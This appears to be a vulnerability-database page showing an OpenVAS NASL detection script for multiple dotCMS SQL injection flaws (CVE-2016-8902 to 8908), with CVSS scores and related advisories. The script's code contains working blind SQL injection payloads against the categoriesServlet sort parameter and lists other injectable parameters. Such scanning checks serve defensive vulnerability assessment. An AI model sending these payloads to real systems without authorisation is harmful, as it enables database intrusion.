Lucene search
Copyright (C) 2016 Greenbone AGOPENVAS:1361412562310106364HistoryNov 02, 2016 - 12:00 a.m.
dotCMS Multiple SQL Injection Vulnerabilities
2016-11-0200:00:00
Copyright (C) 2016 Greenbone AG
plugins.openvas.org
13
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.2 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
Access Complexity
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.004 Low
EPSS
Percentile
75.1%
dotCMS is prone to multiple SQL injection vulnerabilities.
# SPDX-FileCopyrightText: 2016 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:dotcms:dotcms";
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.106364");
script_version("2023-07-20T05:05:17+0000");
script_tag(name:"last_modification", value:"2023-07-20 05:05:17 +0000 (Thu, 20 Jul 2023)");
script_tag(name:"creation_date", value:"2016-11-02 09:37:45 +0700 (Wed, 02 Nov 2016)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"severity_vector", value:"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2016-11-29 19:22:00 +0000 (Tue, 29 Nov 2016)");
script_cve_id("CVE-2016-8902", "CVE-2016-8903", "CVE-2016-8904", "CVE-2016-8905", "CVE-2016-8906",
"CVE-2016-8907", "CVE-2016-8908");
script_tag(name:"qod_type", value:"remote_analysis");
script_tag(name:"solution_type", value:"VendorFix");
script_name("dotCMS Multiple SQL Injection Vulnerabilities");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2016 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_dotcms_detect.nasl");
script_mandatory_keys("dotCMS/installed");
script_tag(name:"summary", value:"dotCMS is prone to multiple SQL injection vulnerabilities.");
script_tag(name:"vuldetect", value:"Tries to perform an unauthenticated partly blind SQL injection and checks
the response.");
script_tag(name:"insight", value:"dotCMS is prone to multiple SQL injection vulnerabilities:
- SQL injection vulnerability in the categoriesServlet allows remote not authenticated attackers to execute
arbitrary SQL commands via the sort parameter. (CVE-2016-8902)
- SQL injection vulnerability in the 'Site Browser > Templates pages' screen allows remote authenticated
attackers to execute arbitrary SQL commands via the _EXT_13_orderby parameter. (CVE-2016-8903)
- SQL injection vulnerability in the 'Site Browser > Containers pages' screen allows remote authenticated
attackers to execute arbitrary SQL commands via the _EXT_12_orderby parameter. (CVE-2016-8904)
- SQL injection vulnerability in the JSONTags servlet allows remote authenticated attackers to execute
arbitrary SQL commands via the sort parameter. (CVE-2016-8905)
- SQL injection vulnerability in the 'Site Browser > Links page' screen allows remote authenticated attackers
to execute arbitrary SQL commands via the _EXT_18_orderby parameter. (CVE-2016-8906)
- SQL injection vulnerability in the 'Content Types > Content Types' screen allows remote authenticated attackers
to execute arbitrary SQL commands via the _EXT_STRUCTURE_orderBy and _EXT_STRUCTURE_direction parameters.
(CVE-2016-8907)
- SQL injection vulnerability in the 'Site Browser > HTML pages' screen allows remote authenticated attackers
to execute arbitrary SQL commands via the _EXT_15_orderby parameter. (CVE-2016-8908)");
script_tag(name:"impact", value:"An attacker may execute arbitrary SQL commands.");
script_tag(name:"affected", value:"dotCMS before 3.3.1");
script_tag(name:"solution", value:"Update to dotCMS 3.3.1 or later.");
script_xref(name:"URL", value:"https://security.elarlang.eu/multiple-sql-injection-vulnerabilities-in-dotcms-8x-cve-full-disclosure.html");
exit(0);
}
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
if (!port = get_app_port(cpe: CPE))
exit(0);
if (!dir = get_app_location(cpe: CPE, port: port))
exit(0);
if (dir == "/")
dir = "";
# TRUE statement
url = dir + '/categoriesServlet?start=0&count=10&sort=keywords%20LIMIT%20(SELECT%20CASE%20WHEN%20(1=1)%20THEN%201%20ELSE%20-1%20END)--';
req = http_get(port: port, item: url);
res = http_keepalive_send_recv(port: port, data: req);
if ('{"numRows":0,"items":[]}' >!< res)
exit(0);
# FALSE statement
url = dir + '/categoriesServlet?start=0&count=10&sort=keywords%20LIMIT%20(SELECT%20CASE%20WHEN%20(1=0)%20THEN%201%20ELSE%20-1%20END)--';
req = http_get(port: port, item: url);
res = http_keepalive_send_recv(port: port, data: req);
if ("Content-Length: 0" >< res) {
security_message(port: port);
exit(0);
}
exit(0);
Related
zdt
zdt
dotCMS 3.x SQL Injection Vulnerability
2016-11-02 00:00:00
packetstorm
packetstorm
dotCMS 3.x SQL Injection
2016-11-01 00:00:00
prion
prion
cvelist
cvelist
cve
cve
nvd
nvd
osv
osv
CVE-2017-5344
2017-02-17 07:59:00
openvas
openvas
dotCMS SQL Injection Vulnerability
2017-02-21 00:00:00
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.2 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
Access Complexity
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.004 Low
EPSS
Percentile
75.1%
Related for OPENVAS:1361412562310106364